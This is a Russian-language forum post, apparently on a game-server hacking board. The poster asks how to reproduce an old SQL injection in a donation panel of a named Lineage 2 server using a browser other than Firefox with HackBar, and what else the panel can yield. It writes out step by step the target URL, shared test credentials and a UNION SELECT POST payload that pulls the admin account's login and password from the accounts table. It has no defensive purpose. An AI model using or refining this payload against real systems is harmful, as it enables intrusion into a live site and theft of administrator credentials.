Привет! Нужно воспроизвести старую уязвимость донат панели только не через мазилу с хакбаром , показать другой способ аналогичный этому только в другом браузере,ну или подскажите что еще можно вытащить с этой панели)
Буду очень признателен за помощь!
[Ссылки могут видеть только зарегистрированные пользователи. ] для теста
акк:painel пасс:painel
Опишу баг еще раз т.к. его удалили с форума.(для мазилы через хакбар)
1. Логинимся в донат панель
2. В верхнюю строчку Хакбара вставляем следущее : http://l2kof.net/donate/painel.php?page=comprar_item
3. В Пост Дата вставляем : items[] =99999 union select 1,2,concat_ws(0x3a,login,password),4,5,6,7,0x69746 56D73 from accounts where access_level=1#
4. В столбце Qtd получаем акк и пасс админа
Регистрация: 13.12.2011
Сообщений: 19
Популярность: 440
Сказал(а) спасибо: 278
Помогите с SQL через POST data
